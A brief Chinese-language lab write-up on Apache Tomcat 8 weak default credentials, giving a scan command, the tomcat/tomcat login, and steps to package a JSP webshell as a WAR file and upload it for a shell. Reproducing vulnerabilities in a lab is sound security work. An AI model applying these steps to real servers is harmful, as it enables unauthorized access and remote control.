Apache-Tomcat_8_weak-password
说明 | 内容 |
---|---|
漏洞编号 | |
漏洞名称 | Apache-Tomcat8 弱口令 |
漏洞评级 | 高危 |
影响范围 | Apache-Tomcat 7+ |
漏洞描述 | 存在默认口令 |
修复方案 |
漏洞描述
正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了某些属性,才可以进行攻击。
漏洞等级
高危
影响版本
- apache-tomcat 7+
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | kali-linux |
Web Server | chrome |
apache-tomcat | 8 |
漏洞扫描
使用nacs可以扫描到漏洞
sudo ./nacs -h 192.168.117.163 -pa 80
漏洞验证
启动环境,访问主页,使用默认账号密码登录
tomcat
tomcat
深度利用
GetShell
可以将木马做成war包进行上传
-
进入java目录
cd tools/java/jdk1.8.0_65/bin
-
将jshell.jsp复制过来
cp /home/kali/tools/webshell/jsp/jshell.jsp ./
-
用jar命令进行压缩
./jar cvf jshell.war jshell.jsp
-
上传war包,会生成路径
-
访问路径即完成getshell
漏洞挖掘
网络测绘
tomcat 8
修复建议
无